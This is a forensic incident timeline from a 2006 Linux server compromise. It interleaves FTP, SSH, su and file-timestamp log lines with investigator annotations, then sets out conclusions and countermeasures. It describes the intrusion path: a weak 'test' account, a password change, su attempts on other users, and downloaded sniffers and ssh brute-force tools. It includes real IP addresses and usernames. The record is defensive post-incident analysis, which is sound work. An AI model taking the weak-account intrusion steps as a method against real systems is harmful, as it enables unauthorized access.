[pid 5944] [anonymous] FAIL LOGIN: Client "82.79.137.6" 2006/03/09 15:01:37 82.79.137.27 Mar 9 15:01:37 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27 2006/03/09 15:01:39 82.79.137.27 vsftpd: Thu Mar 9 15:01:39 2006 [pid 5946] [anonymous] FAIL LOGIN: Client "82.79.137.27" 2006/03/09 15:01:45 82.79.137.18 * vsftpd: Thu Mar 9 15:01:45 2006 [pid 5963] [test] OK LOGIN: Client "82.79.137.18" 2006/03/09 15:01:47 82.79.137.9 * vsftpd: Thu Mar 9 15:01:47 2006 [pid 5967] [test] OK LOGIN: Client "82.79.137.9" 2006/03/09 15:02:07 82.79.137.20 20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:07 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" 2006/03/09 15:02:08 82.79.137.20 20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:08 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.59/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" 2006/03/09 15:02:35 82.79.137.18 18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:35 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" 2006/03/09 15:02:36 82.79.137.18 18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:36 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.51/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" ratibus pts/2 82.233.38.20 Thu Mar 16 23:13 - 23:14 (00:00) 2006/03/17 00:12:32 193.230.222.209 * Mar 17 00:12:32 localhost sshd[30299]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3741 ssh2 2006/03/17 00:12:32 193.230.222.209 * Mar 17 00:12:32 localhost sshd[30318]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 00:12 193.230.222.209 * test pts/2 193.230.222.209 Fri Mar 17 00:12 - 00:30 (00:18) 2006/03/17 00:12:45 193.230.222.209 *!! Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) password changed for test 2006/03/17 00:12:45 193.230.222.209 *!! Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) Password for test was changed 2006/03/17 00:15:35 193.230.222.209 * Mar 17 00:15:35 localhost sshd[30439]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3744 ssh2 2006/03/17 00:15:35 193.230.222.209 * Mar 17 00:15:35 localhost sshd[30454]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 00:15 193.230.222.209 * test pts/3 193.230.222.209 Fri Mar 17 00:15 - 00:15 (00:00) 2006/03/17 00:15:52 193.230.222.209 * Mar 17 00:15:52 localhost sshd[30454]: (pam_unix) session closed for user test 2006/03/17 00:17:28 193.230.222.209 *. Mar 17 00:17:28 localhost su[30537]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=vinoj 2006/03/17 00:17:30 193.230.222.209 *. Mar 17 00:17:30 localhost su[30537]: pam_authenticate: Authentication failure 2006/03/17 00:17:30 193.230.222.209 *. Mar 17 00:17:30 localhost su[30537]: - pts/2 test:vinoj 2006/03/17 00:17:36 193.230.222.209 *. Mar 17 00:17:36 localhost su[30547]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=vinoj 2006/03/17 00:17:38 193.230.222.209 *. Mar 17 00:17:38 localhost su[30547]: pam_authenticate: Authentication failure 2006/03/17 00:17:38 193.230.222.209 *. Mar 17 00:17:38 localhost su[30547]: - pts/2 test:vinoj 2006/03/17 00:18:42 193.230.222.209 .* Mar 17 00:18:42 localhost sshd[30594]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=209-nat.s-man.net user=croulants 2006/03/17 00:18:45 193.230.222.209 .* Mar 17 00:18:45 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net 2006/03/17 00:18:51 193.230.222.209 .* Mar 17 00:18:51 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net 2006/03/17 00:18:59 193.230.222.209 .* Mar 17 00:18:59 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net 2006/03/17 00:19:10 193.230.222.209 .* Mar 17 00:19:10 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net 2006/03/17 00:19:10 193.230.222.209 .* Mar 17 00:19:10 localhost sshd[30591]: Failed keyboard-interactive/pam for croulants from 193.230.222.209 port 3753 ssh2 2006/03/17 00:19:50 193.230.222.209 *. Mar 17 00:19:50 localhost su[30638]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours 2006/03/17 00:19:52 193.230.222.209 *. Mar 17 00:19:52 localhost su[30638]: pam_authenticate: Authentication failure 2006/03/17 00:19:52 193.230.222.209 *. Mar 17 00:19:52 localhost su[30638]: - pts/2 test:trollingsecours 2006/03/17 00:19:57 193.230.222.209 *. Mar 17 00:19:57 localhost su[30643]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours 2006/03/17 00:19:59 193.230.222.209 *. Mar 17 00:19:59 localhost su[30643]: pam_authenticate: Authentication failure 2006/03/17 00:19:59 193.230.222.209 *. Mar 17 00:19:59 localhost su[30643]: - pts/2 test:trollingsecours 2006/03/17 00:20:04 193.230.222.209 *. Mar 17 00:20:04 localhost su[30644]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours 2006/03/17 00:20:06 193.230.222.209 *. Mar 17 00:20:06 localhost su[30644]: pam_authenticate: Authentication failure 2006/03/17 00:20:06 193.230.222.209 *. Mar 17 00:20:06 localhost su[30644]: - pts/2 test:trollingsecours 2006/03/17 00:26:26 193.230.222.253 193.230.222.253 - - [17/Mar/2006:00:26:26 +0100] "GET / HTTP/1.0" 200 1053 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-" 2006/03/17 00:26:27 193.230.222.253 193.230.222.253 - - [17/Mar/2006:00:26:27 +0100] "GET /logowhite.png HTTP/1.0" 200 19801 "http://213.186.53.59/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-" 2006/03/17 00:26:28 193.230.222.253 193.230.222.253 - - [17/Mar/2006:00:26:28 +0100] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-" 2006/03/17 00:28:33 193.230.222.209 * Mar 17 00:28:33 localhost sshd[31078]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3788 ssh2 2006/03/17 00:28:33 193.230.222.209 * Mar 17 00:28:33 localhost sshd[31107]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 00:28 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 00:28 - 00:30 (00:01) 2006/03/17 00:28:40 193.230.222.209 *! Mar 17 06 00:28:40 0 ..c crw--w---- test tty /dev/pts/5 2006/03/17 00:29:02 193.230.222.209 *! Mar 17 06 00:29:02 0 .a. crw--w---- test tty /dev/pts/5 2006/03/17 00:30:31 193.230.222.209 * Mar 17 00:30:31 localhost sshd[31107]: (pam_unix) session closed for user test 2006/03/17 00:30:33 193.230.222.209 * Mar 17 00:30:33 localhost sshd[30318]: (pam_unix) session closed for user test Mar 17 06 06:35:02 0 m.c prw-r----- root adm /dev/xconsole 2006/03/17 09:00:52 193.230.222.209 * Mar 17 09:00:52 localhost sshd[25229]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3050 ssh2 2006/03/17 09:00:52 193.230.222.209 * Mar 17 09:00:52 localhost sshd[25263]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 09:00 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 09:00 - 09:38 (00:37) 2006/03/17 09:03:43 193.230.222.209 *! Mar 17 06 09:03:43 0 ..c crw--w---- test tty /dev/pts/6 2006/03/17 09:03:58 193.230.222.209 *! Mar 17 06 09:03:58 0 .a. crw--w---- test tty /dev/pts/6 2006/03/17 09:38:33 193.230.222.209 * Mar 17 09:38:33 localhost sshd[25263]: (pam_unix) session closed for user test 2006/03/17 12:19:43 193.230.222.209 * Mar 17 12:19:43 localhost sshd[14815]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3222 ssh2 2006/03/17 12:19:43 193.230.222.209 * Mar 17 12:19:43 localhost sshd[14834]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 12:19 193.230.222.209 * test pts/3 193.230.222.209 Fri Mar 17 12:19 - 14:25 (02:05) 2006/03/17 12:26:01 193.230.222.209 * Mar 17 12:26:01 localhost sshd[15484]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3338 ssh2 2006/03/17 12:26:01 193.230.222.209 * Mar 17 12:26:01 localhost sshd[15511]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 12:26 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 12:26 - 14:30 (02:04) 2006/03/17 12:32:44 193.230.222.209 * Mar 17 12:32:44 localhost sshd[16030]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3353 ssh2 2006/03/17 12:32:44 193.230.222.209 * Mar 17 12:32:44 localhost sshd[16037]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 12:32 193.230.222.209 * test pts/7 193.230.222.209 Fri Mar 17 12:32 - 16:26 (03:53) 2006/03/17 14:25:38 193.230.222.209 * Mar 17 14:25:38 localhost sshd[14834]: (pam_unix) session closed for user test 2006/03/17 14:30:58 193.230.222.209 * Mar 17 14:30:58 localhost sshd[15511]: (pam_unix) session closed for user test 2006/03/17 14:36:43 193.230.222.209 * Mar 17 14:36:43 localhost sshd[585]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3934 ssh2 2006/03/17 14:36:43 193.230.222.209 * Mar 17 14:36:43 localhost sshd[671]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 14:36 193.230.222.209 * test pts/3 193.230.222.209 Fri Mar 17 14:36 - 16:49 (02:12) 2006/03/17 14:59:56 193.230.222.209 * Mar 17 14:59:56 localhost sshd[5706]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4025 ssh2 2006/03/17 14:59:56 193.230.222.209 * Mar 17 14:59:56 localhost sshd[5714]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 15:00 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 15:00 - 17:12 (02:12) 2006/03/17 15:03:26 193.230.222.209 * Mar 17 15:03:26 localhost sshd[6092]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4027 ssh2 2006/03/17 15:03:26 193.230.222.209 * Mar 17 15:03:26 localhost sshd[6171]: (pam_unix) session opened for user test by (uid=0) 2006/03/17 15:03 193.230.222.209 * test pts/8 193.230.222.209 Fri Mar 17 15:03 - 15:14 (00:10) 2006/03/17 15:14:06 193.230.222.209 * Mar 17 15:14:06 localhost sshd[6171]: (pam_unix) session closed for user test 2006/03/17 16:26:40 193.230.222.209 * Mar 17 16:26:40 localhost sshd[16037]: (pam_unix) session closed for user test 2006/03/17 16:49:15 193.230.222.209 * Mar 17 16:49:15 localhost sshd[671]: (pam_unix) session closed for user test 2006/03/17 17:12:46 193.230.222.209 * Mar 17 17:12:46 localhost sshd[5714]: (pam_unix) session closed for user test 2006/03/17 17:18 # ## First mails blocked... no contact outside is possible via the default IP source Mar 17 19:30:39 localhost sshd[1425]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1087 ssh2 skycode pts/3 213.49.238.76 Fri Mar 17 19:30 still logged in Mar 17 06 19:30:39 0 ..c crw--w---- skycode tty /dev/pts/3 Mar 17 19:30:50 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash Mar 17 19:33:45 localhost sshd[2170]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1089 ssh2 skycode pts/4 213.49.238.76 Fri Mar 17 19:33 still logged in Mar 17 06 19:33:45 0 ..c crw--w---- skycode tty /dev/pts/4 Mar 17 19:34:41 localhost sudo: skycode : TTY=pts/4 ; PWD=/home ; USER=root ; COMMAND=/bin/bash 2006/03/17 19:37:19 ! Mar 17 19:37:19 localhost su[2642]: + pts/4 root:test Mar 17 06 19:38:16 0 ..c crw--w---- root tty /dev/pts/7 2006/03/17 19:39:21 !! Mar 17 06 19:39:21 2467 m.c -rw-r----- root shadow /etc/shadow = test:$ passwd? 2006/03/17 19:39:21 !! Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) password changed for test 2006/03/17 19:39:21 !! Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) Password for test was changed 2006/03/17 19:40:12 ! Mar 17 19:40:12 localhost su[2763]: + pts/3 root:test 2006/03/17 19:40:19 ! Mar 17 06 19:40:19 4096 m.. drwxr-xr-x test test /home/test 2006/03/17 19:40:19 ! 4096 m.. drwx------ test test /home/test/.mc/cedit = test:$ mc? 2006/03/17 19:40:25 ! Mar 17 06 19:40:25 0 m.. -rw-r--r-- test test /home/test/.mc/history but test not loggued normally 2006/03/17 19:40:25 ! 35 m.. -rw-r--r-- test test /home/test/.mc/Tree or via ./go?? 2006/03/17 19:40:25 ! 4096 m.. drwxr-xr-x test test /home/test/.mc 2006/03/17 19:40:25 ! 32 m.. -rw-r--r-- test test /home/test/.mc/filepos => /tmp/crontab.Hq7als/crontab 1;0 => correspond to crontab -e in .bash_history?... 2006/03/17 19:40:25 ! 1945 m.. -rw-r--r-- test test /home/test/.mc/ini 2006/03/17 19:40:31 ! Mar 17 06 19:40:31 2117 m.. -rw------- test test /home/test/.bash_history phil pts/8 85.234.194.12 Fri Mar 17 20:08 - 20:19 (00:11) phil pts/8 85.234.194.12 Fri Mar 17 20:20 still logged in phil pts/14 85.234.194.12 Fri Mar 17 21:14 still logged in skycode pts/15 213.49.238.76 Fri Mar 17 21:39 still logged in Mar 17 06 21:05:08 0 m.. crw--w---- root tty /dev/pts/12 0 m.. crw------- phil tty /dev/pts/8 Mar 17 06 21:05:09 0 m.. crw--w---- test tty /dev/pts/5 Mar 17 06 21:05:10 0 ma. crw-rw-rw- root tty /dev/ptmx 0 m.. crw--w---- test tty /dev/pts/6 0 .a. crw------- phil tty /dev/pts/8 0 .a. crw-rw-rw- root tty /dev/tty 2006/03/17 21:10:59 # user.log: Mar 17 21:10:59 localhost rpc.mountd: export request from 127.0.0.1 2006/03/17 21:10:59 # user.log: Mar 17 21:10:59 localhost rpc.mountd: dump request from 127.0.0.1 2006/03/17 21:28:56 # Mar 17 21:28:56 localhost -- MARK -- 2006/03/17 21:30:03 # last occurence of 20060317 213003 start /sbin/modprobe -s -k -- net-pf-10 safemode=0 2006/03/17 21:30:03 # last occurence of 20060317 213003 probe ended 2006/03/17 21:45:04 # Mar 17 21:45:04 localhost snmpd[1467]: Connection from 127.0.0.1 2006/03/17 21:45:04 # Mar 17 21:45:04 localhost last message repeated 3 times 2006/03/17 21:48:56 # ## No MARK at 21:48:56 2006/03/17 21:50:05 # Mar 17 21:50:05 localhost snmpd[1467]: Connection from 127.0.0.1 2006/03/17 21:55 # ## No snmp at 21:55 TODO: ===== ftp repository of test?? /var/cache/tct
Conclusions
- Initial breach
- automatic tool scanning ftp accounts could enter with the 'test' account
- manual attempt to log in with the 'test' account
- download over of sniffers and brute-force tools for ssh
- transfers over ftp
- change test password
- 82.79.137.NN = NN.metronetwork.rdsbz.ro
- 193.230.222.209 = 209-nat.s-man.net
- Counter-measures
- don't use dummy passwords ;-)
- don't grant ftp/ssh rights per default
sshd: make use of the "AllowUsers" keyword and explicitely add users when needed - don't grant internet access per default
iptables: cf --uid-owner and other --XXX-owner options
on OUTPUT table to avoid download of malicious code
on INPUT table to avoid bindshells
- Timeline
- Before and during the live forensic analysis we should have written down our own actions and the observable elements rather that having to deduce them from the logs.